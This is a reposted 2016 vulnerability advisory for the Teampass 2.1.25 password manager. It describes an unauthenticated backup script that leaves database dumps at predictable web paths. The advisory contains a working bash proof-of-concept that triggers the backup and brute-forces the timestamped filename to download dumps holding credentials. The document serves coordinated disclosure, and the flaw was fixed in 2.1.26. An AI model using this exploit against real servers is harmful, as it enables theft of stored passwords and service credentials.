首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Teampass 2.1.25 Unauthenticated Access
来源:vulnerability-lab.com 作者:PeterKok 发布时间:2016-05-30  
Document Title:
===============
Teampass v2.1.25 - Unauthenticated Access Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1844


Release Date:
=============
2016-05-18


Vulnerability Laboratory ID (VL-ID):
====================================
1844


Common Vulnerability Scoring System:
====================================
6.8


Product & Service Introduction:
===============================
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, 
MySQL and PHP. It is especially designed to provide passwords access security for allowed people.

(Copy of the Homepage: http://teampass.net/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple vulnerabilities in the official Teampass v2.1.25 application.


Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05-12 Vendor Notification (Teampass Security Team)
2016-05-12: Vendor Response/Feedback (Teampass Security Team)
2016-05-13: Vendor Fix/Patch (Teampass Developer Team)
2016-05-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
An unauthenticated access vulnerability has been discovered in the official Teampass v2.1.25 application.
The vulnerability allows remote attacker unauthenticated access to sensitive database management system information.

The script /backups/script.backup.php allows administrators to create database backups. There are 3 problems with this script ...
- there is no authentication needed to run the script
- the backups are stored within the webroot in the /backups directory
- the name of the backup is predictable as it uses the name bck_cpassman-[epoch time].sql by default

These backup contains all lot of sensitive data. Usernames, hashed passwords, description fields with information, etc..
As most of the passwords inserted by users are hashed, some are visible in clear text like:
- the database password
- in the teampass_misc table there are clear text password for smtp and ldap connections

The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. 
Exploitation of the security web vulnerability requires no privileged web-application user account and user interaction. 
Successful exploitation of the vulnerability results in unauthenticated access of dumps and physical database information.

Vulnerable Module(s):
			[+] ./backups/

Vulnerable File(s):
			[+] script.backup.php


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or privileged user account.
For security demonstration or to reproduce the issue follow the provided information and steps below to continue.

PoC: Exploit
#!/bin/bash

#/backups/script.backup.php in Teampass 2.1.25 and earlier allows unauthenticated access
# Default Teampass database backup filename is bck_cpassmann-[current epoch time].sql and 
# is stored in the backups directory. 
# Only thing we have to do is get the epoch time at which the database backup was generated. 
# First the script gets the server time from the index.php page, runs the script.backup.php 
# to create the backup and again gets the current server time from the index.php. 
# As we now know in which period the backup is created we can guess the filename

BACKUPFILENAME=bck_cpassman

if [ ! "$1" ]
then
        echo "Usage: ___FCKpd___0 [url] [options]"
	echo -e "nOptions:"
	echo -e "t--increase	increase timezone until backup is found(default)"
	echo -e "t--decrease	decrease timezone until backup is found"
        exit 0
fi

#get current server time from login page before generating the backup
S_SERVERTIME=$(curl -k -s $1/|grep "fa fa-clock-o"|rev|awk '{ print $1 }' |rev)
S_EPOCHTIME=$(date +%s -d "$S_SERVERTIME")

#generate backup
curl -k $1/backups/script.backup.php

#get current server time from login page after generating the backup
E_SERVERTIME=$(curl -k -s $1/|grep "fa fa-clock-o"|rev|awk '{ print $1 }' |rev)
E_EPOCHTIME=$(date +%s -d "$E_SERVERTIME")


while :
do
	i=$(($S_EPOCHTIME))
	while [ $i -le $E_EPOCHTIME ]
	do	
		echo -n "Trying to download $1/backups/$BACKUPFILENAME-$i.sql   "
		curl -k -s -f --output /dev/null $1/backups/$BACKUPFILENAME-$i.sql && echo "[+] DATABASE BACKUP FOUND!" && FOUND=1 || echo "[-] not available"
		if [ "$FOUND" == "1" ]
		then
			echo -e "n>>> Database backup available at: $1/backups/$BACKUPFILENAME-$i.sql <<<nn"
			exit 0
		fi
		i=$(($i+1))
	done
	
	if [ "$FOUND" != "1" ] && [ "$2" == "--decrease" ]
	then
                S_EPOCHTIME=$(($S_EPOCHTIME-3600))
                E_EPOCHTIME=$(($E_EPOCHTIME-3600))
                echo "Testing with different timezone($(date -d @$S_EPOCHTIME))"
	elif [ "$FOUND" != "1" ]
	then
		S_EPOCHTIME=$(($S_EPOCHTIME+3600))
		E_EPOCHTIME=$(($E_EPOCHTIME+3600))
		echo "Testing with different timezone($(date -d @$S_EPOCHTIME))"
	fi
done
exit 0


Solution - Fix & Patch:
=======================
Note: The manufacturer fixed the vulnerability and an update is available for download in version 2.1.26.
URL: http://teampass.net/2016-05-13-release-2.1.26


Security Risk:
==============
The security risk of the vulnerabilities in the teampass application are estimated as high. (CVSS 6.8)


Credits & Authors:
==================
Peter Kok -  [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linknat VOS3000/VOS2009 SQL In
·Teampass 2.1.25 Arbitrary File
·Job Script by Scubez - Remote
·Oracle ATS Arbitrary File Uplo
·Operation Technology ETAP 14.1
·Ubiquiti airOS Arbitrary File
·Operation Technology ETAP 14.1
·Micro Focus Rumba+ 9.4 - Multi
·HP Data Protector A.09.00 - Ar
·VirIT Explorer Lite & Pro 8.1.
·WordPress Ninja Forms Unauthen
·Cisco ASA Software IKEv1 / IKE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved